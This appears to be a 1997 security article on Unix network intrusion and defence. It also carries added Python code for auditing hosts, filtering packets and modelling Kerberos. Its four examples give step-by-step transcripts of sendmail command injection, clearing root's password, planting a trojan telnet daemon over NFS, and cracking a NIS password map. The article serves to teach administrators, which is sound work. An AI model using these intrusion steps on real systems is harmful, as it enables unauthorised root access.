S. Linde,
RNC "Kurchatovskij Institut", lsu@kiae.su

---------------------------------------------------------------

The growing interest in TCP/IP networks is driven by the explosive growth of the Internet. It also forces one to think about how to protect one's information resources and computers from intruders of various kinds. To develop countermeasures that actually work, one has to know the intruders' ways and methods. The Internet community has long debated whether or not to publish material on methods of breaking into other people's computer networks. After heated discussion, the need for full openness on this question seems to have been recognized. This article is based on experience of administering a network under constant break-in attempts and on the CERT guidelines.
The purpose of this article is to draw the attention of administrators of networks connected to the Internet to the obvious gaps in the security of the most popular systems. Besides examples of break-ins and possible "holes", we will try to describe briefly the main means of fighting this unavoidable evil. Since most servers on the network run the Unix operating system, it makes sense to begin the overview of possible security gaps with this OS.
The overview should start with break-ins through electronic mail. On the vast majority of systems, mail is transported over IP by the sendmail program, developed at the University of California at Berkeley. Conceived as a purely utility program, it gained enormous popularity and became part of the distribution of many Unix systems. However, it contained a very serious bug, thanks to which anyone who wished could execute commands on a remote machine with superuser privileges. Usually the intruders tried to mail themselves the passwd file for password guessing, or placed their own information in the files that rlogin and rsh use to start a shell without asking for a password (Example 1).
EXAMPLE 1

crack% telnet target.remote.com 25
Connecting to 123.456.654.321.                  ! connecting to port 25 - this is SMTP
220 sendmail SMI/4.3.5.2 ready                  ! the version which, as is known, contains the bug
helo xxx
220 Helo xxx, ( crack.edu )
mail from: "|echo crack.edu>/.rhosts"@target.remote.com
                                                ! a command is substituted for the return address
200 Sender ok.
rcpt to: nosuchuser                             ! a deliberately invalid recipient is entered
500 nosuchuser: user unknown                    ! despite the message, the dialogue continues
data
230 Enter mail, end with "."
200 Mail accepted                               ! that's it, the machine is broken into....
quit
crack% su                                       ! and now we get in so that we are not visible through who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#
This bug is present in several dozen different Unix variants from a wide range of vendors. Besides, under favourable conditions there are even simpler ways: the remote machine is a Sun running SunOS 4, NIS is not running, the system was installed and nothing was corrected afterwards (Example 2).
EXAMPLE 2

crack# su - bin
$ rsh target.remote.com /bin/csh -i             ! /etc/hosts.equiv contains a "+" entry, and the bug...
Welcome to remote.com!                          ! the /etc directory is owned by bin...
Warning! No access to terminal, job control disabled!
% ls -ldg /etc
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/
% cd /etc                                       ! make passwd writable for us...
% mv passwd passwd.was
% cp passwd.was passwd
% ed passwd                                     ! edit it
2341
1p
root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh
s/Nkkh&5gkljGyj//p
root::0:0:Root:/:/bin/csh
w
2341
q
% echo /bin/csh -i | su root                    ! and become superuser
Warning! No access to terminal, job control disabled!
target# mv /etc/passwd.was /etc/passwd          ! so that nobody discovers what we did
Besides electronic mail, TCP/IP networks make very wide use of various kinds of distributed file systems, the most popular of which is the Network File System (NFS).
If the /etc/exports file is filled in carelessly, or a distribution with a bug (SunOS 4.1) is used, the following situation can arise (Example 3).
EXAMPLE 3

crack% showmount -e target.remote.com
Export list for target.remote.com
/home Everyone
/disk3 neptun pluton alpha                      ! the home directories are accessible over NFS
crack% su
# mount -t nfs target.remote.com:/home /mnt
# cd /mnt                                       ! mount the directory on our machine
# ls -ldg *
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/
# echo crack.edu > user/.rhosts                 ! set up the user's .rhosts
# cat >> /etc/passwd
user::257:20::/:
^D                                              ! create the same user on our machine
# su - user                                     ! become that user
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
                                                ! and log in to the remote machine
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc                              ! the directory is writable
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
                                                ! a program has been found that will be started as root
                                                ! from our directory
% cd /usr/etc
% mv in.telnetd in.telnetd1                     ! create a trojan horse
% cat > in.telnetd
#!/bin/sh
exec /bin/csh -i
^D
% chmod 755 in.telnetd                          ! and run it
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
# chown user /etc;                              ! make /etc ours
^M: command not found
# exit;
^M: command not found
Connection closed by foreign host.
% cd /etc                                       ! and then as before, as in Example 1.
.......
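The conditions that Examples 2 and 3 depend on can be audited from the very files they name. The checker below is an added example and not code from this article: it runs over constructed copies of /etc/hosts.equiv, /etc/exports and /etc/inetd.conf and over constructed directory ownership records, so it works offline. The SunOS 4 export syntax (a bare path means every host, the host list is given with -access=), the field order of inetd.conf and the DirStat record type are assumptions made here.

```python
"""Audit for the misconfigurations that Examples 2 and 3 rely on.
Added example, not code from the original article. It checks constructed
copies of /etc/hosts.equiv, /etc/exports and /etc/inetd.conf together with
constructed directory stat records, so it runs offline; the file formats
follow SunOS 4 conventions as assumed here."""
import stat
from collections import namedtuple

# Constructed stand-in for an os.stat() result: permission bits, owner, group.
DirStat = namedtuple("DirStat", "path mode uid gid")

def strip_comment(line):
    return line.split("#", 1)[0].strip()

def hosts_equiv_trusts_everyone(text):
    """A bare '+' line in /etc/hosts.equiv lets any host use rsh/rlogin
    without a password (the entry that Example 2 depends on)."""
    return any(strip_comment(line) == "+" for line in text.splitlines())

def exports_open_to_everyone(text):
    """Exported paths without an -access= host list. In the assumed SunOS 4
    format a bare path is exported to every host; showmount -e shows it as
    'Everyone' (Example 3)."""
    open_paths = []
    for line in map(strip_comment, text.splitlines()):
        if line:
            path, *options = line.split()
            if not any(opt.startswith("-access=") for opt in options):
                open_paths.append(path)
    return open_paths

def dir_writable_by_non_root(d):
    """A system directory owned by a non-root uid, or group/world writable, lets
    an unprivileged account replace files under it (/etc owned by bin in
    Example 2, group-writable /usr/etc in Example 3)."""
    return d.uid != 0 or bool(d.mode & (stat.S_IWGRP | stat.S_IWOTH))

def root_daemons_in_unsafe_dirs(inetd_conf, dir_stats):
    """Services inetd starts as root from a directory flagged above: a trojan
    dropped there runs as root, as in.telnetd does in Example 3.
    dir_stats maps directory path -> DirStat."""
    findings = []
    for line in map(strip_comment, inetd_conf.splitlines()):
        fields = line.split()
        if len(fields) < 6:
            continue
        # inetd.conf fields: service socket-type protocol wait user server [args]
        service, user, server = fields[0], fields[4], fields[5]
        if server == "internal" or user != "root":
            continue
        d = dir_stats.get(server.rsplit("/", 1)[0] or "/")
        if d is not None and dir_writable_by_non_root(d):
            findings.append((service, server))
    return findings

# Constructed sample input mirroring the state shown in Examples 2 and 3.
HOSTS_EQUIV = "# constructed sample\n+\nneptun\n"
EXPORTS = "# constructed sample\n/home\n/disk3 -access=neptun:pluton:alpha\n"
INETD_CONF = (
    "# constructed sample\n"
    "ftp     stream tcp nowait root   /usr/etc/in.ftpd    in.ftpd\n"
    "telnet  stream tcp nowait root   /usr/etc/in.telnetd in.telnetd\n"
    "finger  stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd\n"
    "daytime stream tcp nowait root   internal\n"
)
DIR_STATS = {
    "/etc":     DirStat("/etc",     0o755, uid=1, gid=1),  # owned by bin, as in Example 2
    "/usr/etc": DirStat("/usr/etc", 0o775, uid=1, gid=1),  # bin-owned and group-writable, Example 3
    "/usr/bin": DirStat("/usr/bin", 0o755, uid=0, gid=0),  # correctly set up
}

def run_audit(hosts_equiv=HOSTS_EQUIV, exports=EXPORTS,
              inetd_conf=INETD_CONF, dir_stats=DIR_STATS):
    """Run every check and return the findings in one dictionary."""
    return {
        "hosts_equiv_plus": hosts_equiv_trusts_everyone(hosts_equiv),
        "open_exports": exports_open_to_everyone(exports),
        "unsafe_dirs": sorted(p for p, d in dir_stats.items() if dir_writable_by_non_root(d)),
        "root_daemons_in_unsafe_dirs": root_daemons_in_unsafe_dirs(inetd_conf, dir_stats),
    }

if __name__ == "__main__":
    for name, finding in run_audit().items():
        print(f"{name}: {finding}")
```

On a real host the same functions would be fed the contents of the three files and the os.stat() results of the directories that inetd.conf points at; the last check matters because inetd trusts the path in its configuration and never inspects who may write to that directory.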
If a NIS server is running on the machine and no additional measures have been taken, a special program can be used to "pull" over the network the passwd file shared by a number of machines. If the rules for choosing passwords have not been followed, there is a fairly good chance that the crack program will guess several of them. Events can then develop along one of the scenarios for obtaining superuser privileges (Example 4) (after you have logged in to the remote machine as a user).
EXAMPLE 4

                                                ! check for a NIS server
crack% rpcinfo -p target.remote.com | grep bind
120000 2 udp 2493 ypbind                        ! there is one...
crack% ypx -o target.passwd -g target.remote.com
                                                ! fetch the password file
crack% crack target.passwd                      ! and run the password guesser
[ a lot of time ]
OK, user "user" has password "iamuser"          ! found one, log in
crack% telnet target.remote.com                 ! then as in the previous example.
.....
Naturally, if the ways of defeating protection are known, means of protection must be developed as well. To minimize possible attempts to penetrate a network, a router that can analyze the traffic passing through it and filter packets is very effective. This capability is implemented in practically all hardware routers (cisco, wellfleet...) and as special software for Unix machines (Sun, DEC, BSDI, FreeBSD). Such routers allow the network to operate strictly according to defined rules, for example not passing certain protocols into or out of the local network. It is highly recommended to block rlogin, rsh and RPC (see the Examples), as well as packets addressed to ports 2048 and 2049, the NFS data ports. It is also recommended to define precisely which machines accept mail and to open port 25 only for them. If necessary, a configuration is possible that forbids any logins over the network into the local network altogether while allowing any TCP services of the global network to be used from inside. Such a router, or a combination of several machines and filtering routers, has come to be called a firewall (in Russian, brandmauer).

To establish complete control over all connections one can use a so-called "software firewall". It is a kind of router that controls connections not at the level of IP packets but at the level of the controlled protocols themselves. In this case transparent packet forwarding is switched off; instead of the programs that serve the required protocols (telnet, ftp...), programs are run that relay these protocols to the network on the other side of the machine, usually after checking a database for whether such a connection is legitimate and after identifying the user.
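The filtering policy just described, as an added example that is not the author's router configuration: a small Python model of a stateless border filter applying the rules from the paragraph above (block rlogin, rsh, the RPC portmapper and the NFS ports 2048/2049; allow SMTP only to designated mail hosts; let anything out, but treat an inbound TCP packet with SYN set and ACK clear as a connection attempt, the way the "established" test of routers of that period did). The internal network 192.0.2.0/24, the mail host address and the traffic sample are constructed, and the anti-spoofing rule is an addition of mine rather than something the article lists.

```python
"""Border-router packet filter following the policy in the article.
Added example, not the author's router configuration. It models the
stateless filter of a 1990s router in Python: an inbound TCP packet with
SYN set and ACK clear is a connection attempt from outside, an inbound
packet with ACK set is treated as a reply to a connection opened from
inside. Addresses, the internal network and the mail host are constructed."""
import ipaddress
from collections import namedtuple

# direction: "in" = arriving from the Internet, "out" = leaving the local net.
Packet = namedtuple("Packet", "direction proto src dst dport flags")

INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")   # constructed (documentation range)
MAIL_HOSTS = {"192.0.2.25"}                            # only these may receive SMTP
PORTMAPPER, RLOGIN, RSH, SMTP = 111, 513, 514, 25
NFS_PORTS = {2048, 2049}                               # NFS data ports named in the article

def filter_packet(pkt, mail_hosts=MAIL_HOSTS):
    """Return ("permit" | "deny", reason) for one packet; first match wins."""
    if pkt.direction == "out":
        return "permit", "traffic from inside is not restricted"
    if ipaddress.ip_address(pkt.src) in INTERNAL_NET:
        return "deny", "packet from outside claims an internal source address"
    if pkt.dport == PORTMAPPER:
        return "deny", "RPC portmapper"
    if pkt.dport in (RLOGIN, RSH):
        return "deny", "rlogin/rsh"
    if pkt.dport in NFS_PORTS:
        return "deny", "NFS data port"
    if pkt.proto == "tcp" and pkt.dport == SMTP:
        if pkt.dst in mail_hosts:
            return "permit", "SMTP to a designated mail host"
        return "deny", "SMTP to a host that does not accept mail"
    if pkt.proto == "tcp" and "ACK" in pkt.flags:
        return "permit", "reply to a connection opened from inside"
    if pkt.proto == "tcp":
        return "deny", "connection attempt from outside"
    return "deny", "default deny"

# Constructed traffic sample: what arrives at the router in either direction.
SAMPLE_PACKETS = [
    Packet("in",  "tcp", "198.51.100.7",  "192.0.2.25",    25,   {"SYN"}),
    Packet("in",  "tcp", "198.51.100.7",  "192.0.2.40",    25,   {"SYN"}),
    Packet("in",  "tcp", "198.51.100.7",  "192.0.2.40",    514,  {"SYN"}),
    Packet("in",  "udp", "198.51.100.7",  "192.0.2.40",    2049, set()),
    Packet("in",  "udp", "198.51.100.7",  "192.0.2.40",    111,  set()),
    Packet("in",  "tcp", "198.51.100.80", "192.0.2.40",    1025, {"ACK"}),
    Packet("in",  "tcp", "198.51.100.80", "192.0.2.40",    23,   {"SYN"}),
    Packet("in",  "tcp", "192.0.2.9",     "192.0.2.40",    1025, {"ACK"}),
    Packet("out", "tcp", "192.0.2.40",    "198.51.100.80", 80,   {"SYN"}),
]

def run_filter(packets=SAMPLE_PACKETS):
    """Apply the policy to each packet and return the list of verdicts."""
    return [filter_packet(p)[0] for p in packets]

if __name__ == "__main__":
    for p in SAMPLE_PACKETS:
        verdict, reason = filter_packet(p)
        print(f"{verdict:6} {p.direction:3} {p.proto} {p.src} -> {p.dst}:{p.dport}  ({reason})")
```

Two caveats before carrying the idea over to a real router: the ACK test trusts a flag that the sender sets, so a stateful filter is preferable wherever the router offers one, and the default deny also stops UDP replies such as DNS answers, which need rules of their own.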
To the user such a firewall looks like the only window into the outside world. For example, if on your network, in order to ftp to the machine arch.kiae.su, you have to type:
% ftp arch.kiae.su
Connected to arch.kiae.su
Name: (arch.kiae.su: you)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our.workstation.our.company.com
.....
then with a software firewall you have to type:
% ftp our-soft-firewall
Name: (our-soft-firewall:user) ftp@arch.kiae.su
Password: XXXXXXX
Connected to arch.kiae.su
Name: (arch.kiae.su: ftp)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our-soft-firewall.our.company.com
.......
telnet, rlogin, X11 and so on work in the same way.
All the examples considered above belong to the so-called "active" methods. Careful system administration easily nullifies all the holes considered, but it is completely powerless against a "passive" attack. What is that? The most widespread and easiest method to carry out is analysis of the information transmitted over communication channels, mostly over an Ethernet. It relies on a property of that network: every transmitted packet can be examined by any machine attached to that segment of the network. Given a sufficiently fast machine with an adapter that permits receiving all packets, one can easily extract information such as passwords and NFS packets. If several routers sit on that segment, our filter will catch not only the passwords of our network but also those exchanged by the routers. Thus in a comparatively short time one can collect a collection of passwords for several hundred machines.
To counter such methods, a network user authentication system called Kerberos was developed at the end of the 1980s. Its main goal was to eliminate completely the sending of passwords over the network. The user enters the password only once, when logging in, after which a "ticket" valid for several hours is issued and stored in a file in encrypted form. This ticket contains information about the user, the time of issue, the machine address and a randomly generated key for the further exchange of authentication information. The user's password serves as the initial key. The ticket issued at login is used to obtain secondary tickets, on the strength of which some network service may be granted. On the server side a similar mechanism is used, with the difference that the role of the user is played by the program providing the requested kind of service. Thus the user's program and the program on the server obtain a pair of random keys with which they encrypt the authentication information, attach checksums to it and on that basis satisfy themselves that each is who it claims to be. After that the user's program can access the service without a password prompt. Without knowledge of the initial keys the session will not take place. In addition, the resulting pair of keys can be used to encrypt the whole network session. This system has a number of shortcomings. First, it assumes a clear division of machines into workstations and servers. If a user, having logged in to a server, wishes to telnet from there to another machine, authentication will not work, because the user holds the initial ticket only on the workstation where the password was entered. In other words, in Kerberos version 4 the user's credentials are not passed on to other machines.

Moreover, a dedicated machine is required for the Kerberos server, and it must operate under maximum secrecy, since it holds the database containing all the users' passwords. Kerberos version 4 is of very limited use in a network where, for a number of reasons, the Kerberos server may become unreachable (unforeseen routing failures, degraded or broken connectivity and so on). Some of the shortcomings listed above are removed in version 5, but that implementation is prohibited from export from the USA. The Sphinx system from DEC and NIS+ from Sun also work by the algorithm described. They differ in the encryption algorithms used, in a different transport protocol (RPC instead of UDP) and in the ways administrative domains are combined into a hierarchy.
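The exchange described in the two paragraphs above, as an added example: a toy Python model of the Kerberos v4 ticket flow, not the MIT code. The cipher is a throwaway HMAC-SHA256 construction standing in for DES, and the principals, addresses, password and clock values are constructed. It shows the password being used only on the workstation, the initial ticket buying a service ticket, the mutual check between client and server, and the version 4 limitation the article describes: the ticket issued to the workstation is refused when presented from the server the user has logged in to.

```python
"""Kerberos-style ticket exchange between a workstation, the KDC and a server.
Added example, toy code rather than the MIT implementation: messages are JSON
protected by seal()/open_sealed(), an HMAC-SHA256 stream cipher plus MAC that
stands in for Kerberos v4's DES. Principals, addresses, times and the password
are constructed."""
import hashlib, hmac, json, os

LIFETIME, SKEW = 8 * 3600, 300   # ticket life (a few hours); authenticator freshness window

def _stream(key, nonce, n):
    return b"".join(hmac.new(key, nonce + i.to_bytes(4, "big"), "sha256").digest()
                    for i in range(n // 32 + 1))

def seal(key, obj):
    """Encrypt-then-MAC a JSON-serialisable object under a 32-byte key."""
    pt, nonce = json.dumps(obj).encode(), os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _stream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()

def open_sealed(key, blob):
    """Check the MAC and decrypt; a wrong key raises ValueError."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("wrong key or tampered message")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _stream(key, nonce, len(ct)))))

def key_from_password(password):
    return hashlib.sha256(password.encode()).digest()   # toy string-to-key

def authenticator(skey_hex, user, now):
    return seal(bytes.fromhex(skey_hex), {"user": user, "time": now})   # proves the session key

def validate(t, auth, addr, now):
    """Tickets are bound to an address and a lifetime and need a fresh authenticator."""
    if t["addr"] != addr:
        raise ValueError("ticket presented from a different machine")
    if not t["issued"] <= now < t["issued"] + t["life"]:
        raise ValueError("ticket expired")
    a = open_sealed(bytes.fromhex(t["skey"]), auth)
    if a["user"] != t["user"] or abs(now - a["time"]) > SKEW:
        raise ValueError("authenticator does not match the ticket")
    return a

class KDC:
    """Holds every principal's key: the database that must live on a dedicated, protected machine."""
    def __init__(self, keys):
        self.keys, self.tgs_key = keys, os.urandom(32)
    def _issue(self, key, user, addr, now):
        skey = os.urandom(32).hex()
        return skey, seal(key, {"user": user, "addr": addr, "issued": now,
                                "life": LIFETIME, "skey": skey})
    def login(self, user, addr, now):
        """AS exchange: only the holder of the user's password key can read the reply."""
        skey, tgt = self._issue(self.tgs_key, user, addr, now)
        return seal(self.keys[user], {"skey": skey, "tgt": tgt.hex()})
    def service_ticket(self, tgt, auth, service, addr, now):
        """TGS exchange: a valid TGT plus authenticator buys a ticket for service."""
        t = open_sealed(self.tgs_key, tgt)
        validate(t, auth, addr, now)
        skey, ticket = self._issue(self.keys[service], t["user"], addr, now)
        return seal(bytes.fromhex(t["skey"]), {"skey": skey, "ticket": ticket.hex()})

def server_accept(service_key, ticket, auth, addr, now):
    """Server side: verify, then answer under the session key (mutual authentication)."""
    t = open_sealed(service_key, ticket)
    a = validate(t, auth, addr, now)
    return seal(bytes.fromhex(t["skey"]), {"time": a["time"] + 1})

def session(kdc, user, password, service, addr, now, wire):
    """Whole client flow from workstation addr; every message sent goes into wire."""
    reply = kdc.login(user, addr, now); wire.append(reply)
    creds = open_sealed(key_from_password(password), reply)   # password used only here
    tgt, auth = bytes.fromhex(creds["tgt"]), authenticator(creds["skey"], user, now)
    reply = kdc.service_ticket(tgt, auth, service, addr, now); wire += [tgt, auth, reply]
    svc = open_sealed(bytes.fromhex(creds["skey"]), reply)
    ticket, auth = bytes.fromhex(svc["ticket"]), authenticator(svc["skey"], user, now)
    mutual = server_accept(kdc.keys[service], ticket, auth, addr, now)
    wire += [ticket, auth, mutual]
    return open_sealed(bytes.fromhex(svc["skey"]), mutual)["time"] == now + 1

def rejects(fn):
    try: fn(); return False
    except ValueError: return True

def demo():
    """Return (service granted, password seen on wire, hop refused, wrong password refused)."""
    pw, now = "correct horse", 1_000_000                    # constructed
    kdc = KDC({"user": key_from_password(pw), "rcmd.server1": os.urandom(32)})
    wire = []
    granted = session(kdc, "user", pw, "rcmd.server1", "ws1", now, wire)
    leaked = any(pw.encode() in m for m in wire)
    creds = open_sealed(key_from_password(pw), kdc.login("user", "ws1", now))
    # The v4 limitation: the ticket issued to ws1 is refused when used from server1.
    hop_refused = rejects(lambda: kdc.service_ticket(bytes.fromhex(creds["tgt"]),
        authenticator(creds["skey"], "user", now), "rcmd.server1", "server1", now))
    bad_pw_refused = rejects(lambda: open_sealed(key_from_password("wrong"),
                                                 kdc.login("user", "ws1", now)))
    return granted, leaked, hop_refused, bad_pw_refused
```

Everything that crosses the wire in session() is a sealed message or a ticket, so the password never leaves the workstation; the address field in each ticket is what makes the hop from server1 fail, and the lifetime field is what limits the damage if the ticket file is stolen.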
Besides those considered, there are other, more sophisticated ways of intrusion. Many of them can be neutralized by simple "careful" administration. Statistically, most break-ins happen because of the negligence of administrators or of the staff operating the system. Without putting it off, check the methods of unauthorized access listed above: if you manage to "break into" your own computer, others can do it too.
Last-modified: Mon, 05 May 1997 07:36:09 GMT